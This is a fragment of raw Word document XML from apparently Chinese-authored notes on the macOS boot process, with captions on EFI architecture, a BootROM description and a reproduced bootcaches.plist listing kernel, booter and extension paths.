              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FAA3D9D" wp14:editId="010A8CF3">
                <wp:extent cx="302895" cy="302895"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="15" name="Rectangle 15" descr="mk:@MSITStore:L:\Book\Mac%20Book\%5bMac.OS.X开发系列电子书%5d.Mac.OS.X.Internals.-.A.Systems.Approach.chm::/0321278542/images/singhfig4-20_al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24460" id="Rectangle 15" o:spid="_x0000_s1026" alt="mk:@MSITStore:L:\Book\Mac%20Book\%5bMac.OS.X开发系列电子书%5d.Mac.OS.X.Internals.-.A.Systems.Approach.chm::/0321278542/images/singhfig4-20_alt.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" filled="f" stroked="f">
                <o:lock v:ext="edit" aspectratio="t"/>
                <w10:anchorlock/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CCE02BF" wp14:editId="564C2344">
            <wp:extent cx="5274310" cy="624676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246761"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE1A31" w:rsidRDefault="00BE1A31" w:rsidP="00BE1A31">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> EFI architecture</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00741781" w:rsidRDefault="00741781" w:rsidP="00741781">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41F1D0CA" wp14:editId="74E3B8E2">
            <wp:extent cx="5274310" cy="40448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44859"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00741781" w:rsidRDefault="00741781" w:rsidP="00741781">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> EFI Architecture Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3646E" w:rsidRDefault="00F3646E" w:rsidP="00F3646E"/>
    <w:p w:rsidR="00F3646E" w:rsidRPr="006B4005" w:rsidRDefault="00F3646E" w:rsidP="00F3646E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc445313215"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BootROM(FirmWire)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="00F3646E" w:rsidRDefault="00F3646E" w:rsidP="00F3646E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>COMPOSED OF THE P.O.S.T (POWER-ON SELF TEST) AND A E.F.I. (EXTENSIBLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>FIRMWARE INTERFACE),THE BOOTROM VERIFIES MEMORY, INITIALIZES SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>HARDWARE,ANDSELECTS THE OS PARTITION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F38BEB2" wp14:editId="1EF8919A">
            <wp:extent cx="39243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300" cy="2019300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3646E" w:rsidRPr="005C662A" w:rsidRDefault="00F3646E" w:rsidP="00F3646E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> BootROM property</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3646E" w:rsidRPr="00F3646E" w:rsidRDefault="00F3646E" w:rsidP="00F3646E"/>
    <w:p w:rsidR="006B4005" w:rsidRPr="006B4005" w:rsidRDefault="006B4005" w:rsidP="001F74D8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc445313216"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>bootcaches.plist</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRDefault="00C30BAD" w:rsidP="00314D7D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B216C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/usr/standalone/bootcaches.plist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="006B4005" w:rsidRDefault="004106D2" w:rsidP="00314D7D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidR="006B4005" w:rsidRPr="006B4005">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="16"/>
          </w:rPr>
          <w:t>https://pikeralpha.wordpress.com/2014/06/04/os-x-10-10-yosemite-dp1-kernelcache/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="006B4005" w:rsidRDefault="006B4005" w:rsidP="00314D7D"/>
    <w:p w:rsidR="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00314D7D">
      <w:r>
        <w:object w:dxaOrig="161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41.55pt" o:ole="">
            <v:imagedata r:id="rId23" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1544944507" r:id="rId24"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>&lt;!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>&lt;plist version="1.0"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>&lt;dict&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;key&gt;PreBootPaths&lt;/key&gt;     &lt;!-- stored at root of any Apple_Boot --&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key&gt;DiskLabel&lt;/key&gt;    &lt;!-- to be tweaked for the picker --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;string&gt;/System/Library/CoreServices/.disk_label&lt;/string&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;!-- implied .disk_label helper files --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;key&gt;AdditionalPaths&lt;/key&gt;  &lt;!-- optional stuff at the root --&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string&gt;/.VolumeIcon.icns&lt;/string&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;string&gt;/System/Library/CoreServices/SystemVersion.plist&lt;/string&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;string&gt;/System/Library/CoreServices/PlatformSupport.plist&lt;/string&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p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;key&gt;BooterPaths&lt;/key&gt;      &lt;!-- to be blessed appropriately --&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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        &lt;key&gt;EFIBooter&lt;/key&gt;    &lt;!-- finderinfo[1] -&gt; file --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;string&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>/System/Library/CoreServices/boot.efi</w:t>
      </w:r>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>&lt;/string&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p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;key&gt;PostBootPaths&lt;/key&gt;    &lt;!-- in RPS directories known to booter --&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key&gt;BootConfig&lt;/key&gt;   &lt;!-- to be updated w/UUID in Apple_Boot --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;string&gt;/Library/Preferences/SystemConfiguration/com.apple.Boot.plist&lt;/string&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;key&gt;EncryptedRoot&lt;/key&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key&gt;EncryptedPropertyCache&lt;/key&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;string&gt;/System/Library/Caches/com.apple.corestorage/EncryptedRoot.plist.wipekey&lt;/string&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;!-- OS doesn't require content in the root volume's ER.pl.wk --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;key&gt;RootVolumePropertyCache&lt;/key&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;false/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;key&gt;DefaultResourcesDir&lt;/key&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;string&gt;/usr/standalone/i386/EfiLoginUI/&lt;/string&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;!-- localized resources are optional but are all or nothing --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;key&gt;LocalizationSource&lt;/key&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;string&gt;/System/Library/PrivateFrameworks/EFILogin.framework/Resources/EFIResourceBuilder.bundle/Contents/Resources&lt;/string&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;key&gt;LanguagesPref&lt;/key&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;string&gt;/Library/Preferences/.GlobalPreferences.plist&lt;/string&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;key&gt;BackgroundImage&lt;/key&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;string&gt;/Library/Caches/com.apple.desktop.admin.png&lt;/string&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;key&gt;LocalizedResourcesCache&lt;/key&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            &lt;string&gt;/System/Library/Caches/com.apple.corestorage/EFILoginLocalizations&lt;/string&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key&gt;Kernelcache v1.3&lt;/key&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key&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006956E7">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>ExtensionsDir</w:t>
      </w:r>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>&lt;/key&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string&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006956E7">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>/System/Library/Extensions</w:t>
      </w:r>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>&lt;/string&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;string&gt;/Library/Extensions&lt;/string&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key&gt;Path&lt;/key&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;string&gt;/System/Library/Caches/com.apple.kext.caches/Startup/kernelcache&lt;/string&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;key&gt;KernelPath&lt;/key&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;string&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>/System/Library/Kernels/kernel</w:t>
      </w:r>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>&lt;/string&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;key&gt;KernelsDir&lt;/key&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;string&gt;/System/Library/Kernels&lt;/string&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;key&gt;Archs&lt;/key&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string&gt;x86_64&lt;/string&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;/array&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;key&gt;Preferred Compression&lt;/key&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;string&gt;lzvn&lt;/string&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 xml:space="preserve">    &lt;/dict&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B216C3" w:rsidRPr="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>&lt;/dict&gt;</w:t>
      </w:r>
    </w:p>
